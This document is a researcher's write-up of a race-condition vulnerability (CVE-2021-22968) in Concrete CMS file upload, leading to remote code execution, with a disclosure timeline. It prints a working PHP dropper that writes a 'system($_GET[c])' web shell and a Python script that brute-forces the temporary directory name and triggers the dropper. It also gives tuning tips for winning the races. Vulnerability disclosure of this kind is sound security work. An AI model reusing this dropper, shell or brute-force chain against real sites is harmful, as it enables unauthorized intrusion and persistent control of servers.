Intro
Concrete CMS is designed for ease of use, targeting users with minimal technical skills. It lets users edit site content directly from the page, provides version management for every page (similar to wiki software), and includes an embedded editor for images. As of 2021, there are over 62,000 live websites running Concrete CMS under the hood. During a recent pentest, our team found a very interesting vulnerability. Discovering it was relatively simple (a race condition), but creating a PoC was quite challenging, hence this post. To exploit it and gain RCE in Concrete CMS, all you need is a low-privileged user.
The vulnerability – a race condition in the file upload
As a limited user you can upload files from remote servers: you enter a URL and the CMS uses curl to download the file and write it locally (or to an AWS S3 bucket). This curl request has a 60-second timeout, which will become relevant later.
Now, some of you might be screaming “SSRF!”, which is fair, but we’ll get to that, and to how we bypassed all the SSRF mitigations, in the second part of this series. Some validations are in place for the filename; for example, if you try to download a PHP file, the upload is rejected with a validation error.
The validations looked pretty good, but you know what we realized when tracing the code? Concrete CMS does good validations, but AFTER it saves the file locally, not before! That gives us a race condition between the moment the file is written locally and the moment it is deleted because of the failed validations. This is our first race condition, because, as you will see, there are two race conditions in the file upload to exploit. When we noticed it, we knew we could get RCE in Concrete CMS, but the actual exploit development took longer than expected.
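To make the flawed ordering concrete, here is a minimal Python sketch of the logic. This is a simplification, not the actual Concrete CMS PHP; the function name and the bare extension check are ours, standing in for the CMS's real validation pipeline:

```python
import os
import shutil
import tempfile
import urllib.request

def import_remote_file(url):
    """Sketch of the vulnerable order of operations: download first,
    validate afterwards (hypothetical simplification of the CMS flow)."""
    tmp_dir = tempfile.mkdtemp()                      # "volatile" directory
    local = os.path.join(tmp_dir, os.path.basename(url))
    with urllib.request.urlopen(url, timeout=60) as resp, open(local, "wb") as out:
        shutil.copyfileobj(resp, out)                 # file hits the disk FIRST
    if local.endswith(".php"):                        # validation runs AFTER the write
        shutil.rmtree(tmp_dir)                        # rejected: directory is wiped...
        return None                                   # ...but the .php briefly existed
    return local
```

The race window is exactly the span between the `copyfileobj` write and the `rmtree` cleanup: during that time the rejected file is live on disk.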
Let’s check the code to see what’s going on:
But where is $temporaryDirectory coming from? The VolatileDirectory class creates a temporary directory in its constructor and deletes it in its destructor.
The downloaded file is written inside this new directory. The directory name is pseudo-random: $i will always be 0 in practice, so we need to check uniqid()’s behaviour to understand what it does. Another problem is that after the file download and the CMS’s post-download processing, the VolatileDirectory destructor will delete everything.
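The lifecycle can be illustrated with a small Python analogue. This is a sketch of the pattern described above, not the real Concrete CMS class; the uniqid()-style naming is an assumption we verify in the next section:

```python
import os
import shutil
import tempfile
import time

class VolatileDirectory:
    """Analogue of the pattern above: the directory is created in the
    constructor and removed in the destructor, so it only exists for
    the lifetime of the object."""

    def __init__(self, base=None):
        base = base or tempfile.gettempdir()
        # uniqid()-style name: current seconds + microseconds, in hex
        now = time.time()
        sec = int(now)
        usec = int((now - sec) * 1_000_000)
        self.path = os.path.join(base, f"{sec:08x}{usec:05x}")
        os.makedirs(self.path)

    def __del__(self):
        # destructor wipes the directory and everything inside it
        shutil.rmtree(self.path, ignore_errors=True)
```

The attacker-relevant detail is that anything inside `self.path` disappears as soon as the object goes out of scope, i.e. when the upload request finishes.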
Uniqid() behaviour
OK, so as we said, let’s check the uniqid() function in the PHP source code to see what it returns:
This is really simple; there’s nothing too complex here. As you can see, it simply executes gettimeofday(), which returns the current seconds and microseconds. There is no $more_entropy here, so the entire return value is based on seconds/microseconds, and as we know these are highly predictable and can be brute-forced. We only need enough time to do it, because in our initial tests a request took about 100 ms to execute.
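The behaviour is easy to reproduce. Here is a Python reimplementation of uniqid()'s return value, based on the formatting in the PHP source (hex seconds followed by hex microseconds, 13 characters total):

```python
import time

def php_uniqid():
    """Mimic PHP uniqid() without $more_entropy: the epoch seconds as
    8 hex chars followed by the microseconds as 5 hex chars. The whole
    value is derived from the current time, so it is brute-forceable."""
    now = time.time()
    sec = int(now)
    usec = int((now - sec) * 1_000_000)
    return f"{sec:08x}{usec:05x}"
```

If you know the second, only the microsecond part is unknown: one million candidates at most.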
We need a plan
So basically, in order to guess the name of the random directory, we need to guess the second and the microsecond the server will use. The second part is easy: we sync our host’s time with the server’s time, based on the response headers, and place our attack server in the same time zone or AWS region, as close as possible to the target. But a request takes about 100 ms to execute, so we need to extend the upload request’s execution time as much as possible to leave ourselves time to brute-force the volatile directory name. There are 1M possible directory names to check, one for each microsecond of the target second.
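Syncing clocks is straightforward, since every HTTP response carries a Date header in RFC 7231 format. A small Python sketch (the helper names are ours):

```python
import time
from email.utils import parsedate_to_datetime

def server_epoch(date_header):
    """Epoch seconds of the server clock, parsed from an HTTP Date
    response header, e.g. 'Sun, 06 Nov 1994 08:49:37 GMT'."""
    return int(parsedate_to_datetime(date_header).timestamp())

def clock_offset(date_header):
    """Seconds to add to our local clock to approximate the server's.
    Date has one-second resolution, so expect +/- 1 second of error."""
    return server_epoch(date_header) - int(time.time())
```

With the offset known, the second is fixed and only the one million microsecond values remain to brute-force.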
How can we achieve this? Very simple: we add a sleep() of 30-60 seconds to the test.php file, which gives us more time to win the race condition. This basically forces the CMS to keep the $temporaryDirectory on the local filesystem for 30-60 seconds before deleting it, enough time for us to brute-force the directory name with Turbo Intruder. When we find the existing directory, we get back a 200 HTTP response code. Below is the test.php file we used (this PHP file echoes another PHP file, and the echoed PHP code writes a PHP shell in the parent directory):
<?php
set_time_limit(0); // don't let PHP kill the script while it sleeps
sleep(35);         // hold the CMS's curl connection open for ~35 seconds
// The body served to the CMS: a dropper that writes a permanent shell
// one directory up, followed by ~50 MB of padding.
echo '<?php file_put_contents("../shell.php","<?php system(\$_GET[c]) ;");';
echo '?>' . str_repeat("A",50000000);
flush();
ob_flush();
?>
Here’s a diagram of all the relevant moments of the attack; hopefully this will make things a bit clearer.
- T0: you start the upload request AND you start searching for the volatile dir name. You have 1M possibilities; we managed to send 16-17K requests per second, so you can easily brute-force 500-700K names in ~30 seconds. That’s a 50% chance, which works great. We didn’t queue 1M requests, due to some issues with Turbo Intruder.
- T1: you discover the volatile dir name (winning the first race), but test.php is not there yet. So you have to start searching for test.php (the second race condition in the file upload), which will ALWAYS be written roughly 30 seconds after T0. We queue another 500K requests in Turbo Intruder for this.
- T2 (~30th second): test.php is written locally, inside the volatile dir
- T3: one of the queued requests from T1 executes test.php and writes a permanent shell in the parent directory (“/application/files/tmp”)
- T4: both the volatile dir and the test.php inside it are deleted, but we already have a shell 🙂
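The two phases above can be sketched in Python as follows. This is a simplified, sequential version showing the logic only; the real PoC used Turbo Intruder with thousands of concurrent requests, and the target host and path here are hypothetical:

```python
import time
import urllib.error
import urllib.request

TARGET = "http://target.example/application/files/tmp"  # hypothetical target

def candidate_dirs(epoch_sec):
    """All uniqid()-style names for one server second: hex seconds
    followed by the hex microseconds (1M candidates per second)."""
    for usec in range(1_000_000):
        yield f"{epoch_sec:08x}{usec:05x}"

def probe(url):
    """HTTP status code of a GET, or None on connection errors."""
    try:
        with urllib.request.urlopen(url, timeout=2) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except OSError:
        return None

def attack(epoch_sec, window=35):
    # Phase 1 (first race): find the volatile directory; 200 means it exists.
    volatile = next((d for d in candidate_dirs(epoch_sec)
                     if probe(f"{TARGET}/{d}/") == 200), None)
    if volatile is None:
        return None
    # Phase 2 (second race): hammer test.php until it lands on disk and
    # executes; when it does, it drops the permanent shell one level up.
    deadline = time.time() + window
    while time.time() < deadline:
        if probe(f"{TARGET}/{volatile}/test.php") == 200:
            return f"{TARGET}/shell.php"
    return None
```

A sequential loop like this can never reach 16-17K RPS; in practice both phases have to be fired as large concurrent batches, which is exactly what Turbo Intruder is for.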
After we guess the name of the directory, we request test.php, which writes a permanent shell in the parent directory. Here’s a screenshot from Turbo Intruder with the guessed directory name:
The second race condition in the file upload
By making test.php execute for ~30 seconds in order to guess the directory name, we have created a second race condition. We don’t know exactly when test.php will be written to the CMS filesystem, but it will obviously be after it has finished its own execution on the remote server (the sleep time plus a few more milliseconds). In practice this means that if we guess the directory name in the 10th second, we have to queue another 500K-1M requests in Turbo Intruder, and these have to cover the whole interval until test.php gets written to the filesystem. Worst case scenario, you have to keep sending requests for another ~30 seconds.
You can see in the screenshot above how we keep sending requests to test.php until it executes. This is our temporary shell, and it writes a permanent shell in the parent directory.
RCE in Concrete CMS
We hope things have been pretty clear so far; here’s our shell, which gives us RCE & persistence:
Discovering this vulnerability was relatively easy, but putting a PoC together was a very time-consuming activity. We also ran into Turbo Intruder issues; thanks to @albinowax for fixing them. You can find our PoC here.
Tips
- the curl timeout is 60 seconds, so do not sleep() for more than 60 seconds in test.php
- use HTTP/2 if possible (for speed; it makes the race conditions easier to win)
- use tail -f access_log and tail -f error_log to monitor your requests and any errors
- check that your upload request from request.txt still has a valid session
- the upload request must come from a single IP by default
Timeline
- 30/10/2021 report sent to the vendor
- 08/11/2021 patch released (versions 8.5.7/9.0.1 – CVE-2021-22968)
- 15/11/2021 published this write-up
References
Multiple vulnerabilities in Concrete CMS Part 2
Account Takeover through Password Reset Poisoning vulnerability in Drupal CMS
Account Takeover through Password Reset Poisoning vulnerability and a Stored XSS for Full Compromise in Joomla